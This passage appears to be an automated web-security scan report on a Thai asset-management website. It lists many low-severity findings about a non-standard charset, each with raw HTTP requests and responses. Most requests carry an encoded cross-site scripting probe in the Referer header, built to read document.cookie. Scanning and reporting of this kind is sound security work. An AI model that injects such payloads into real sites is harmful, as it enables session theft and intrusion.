<body>

<table width="100%"
...[SNIP]...

32.31. http://www.ktam.co.th/en/index.php  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/en/main/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:52:17 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Set-Cookie: PHPSESSID=d1cdc7e3a8eb0c5a4b6b250bbd07f90f; path=/
Connection: close
Content-Type: text/html
Content-Length: 29475

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.32. http://www.ktam.co.th/en/index.php/a  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/a

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/a HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:39 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29467

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.33. http://www.ktam.co.th/en/index.php/declarationnav.php  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/declarationnav.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/declarationnav.php HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:25:54 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29484

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.34. http://www.ktam.co.th/en/index.php/ims/ads_csi300_2.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/ads_csi300_2.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/ads_csi300_2.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:05 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29482

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.35. http://www.ktam.co.th/en/index.php/ims/b_ktam_news11.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_ktam_news11.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/b_ktam_news11.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:52 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29483

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.36. http://www.ktam.co.th/en/index.php/ims/b_ktam_news12.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_ktam_news12.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/b_ktam_news12.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:13 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29483

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.37. http://www.ktam.co.th/en/index.php/ims/b_ktam_news13.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_ktam_news13.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/b_ktam_news13.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:51 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29483

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.38. http://www.ktam.co.th/en/index.php/ims/b_ktam_news21.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_ktam_news21.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/b_ktam_news21.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:52 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29483

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.39. http://www.ktam.co.th/en/index.php/ims/b_ktam_news22.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_ktam_news22.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/b_ktam_news22.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:12 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29483

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.40. http://www.ktam.co.th/en/index.php/ims/b_ktam_news23.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_ktam_news23.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/b_ktam_news23.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:53 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29483

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.41. http://www.ktam.co.th/en/index.php/ims/b_nav11.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_nav11.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/b_nav11.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:57 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29477

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.42. http://www.ktam.co.th/en/index.php/ims/b_nav12.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_nav12.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/b_nav12.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:14 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29477

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.43. http://www.ktam.co.th/en/index.php/ims/b_nav13.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_nav13.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/b_nav13.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:56 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29477

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.44. http://www.ktam.co.th/en/index.php/ims/b_nav21.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_nav21.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/b_nav21.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:03 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29477

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.45. http://www.ktam.co.th/en/index.php/ims/b_nav22.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_nav22.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/b_nav22.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:15 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29477

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.46. http://www.ktam.co.th/en/index.php/ims/b_nav23.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_nav23.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/b_nav23.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:03 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29477

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.47. http://www.ktam.co.th/en/index.php/ims/bg_cr1.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bg_cr1.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/bg_cr1.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
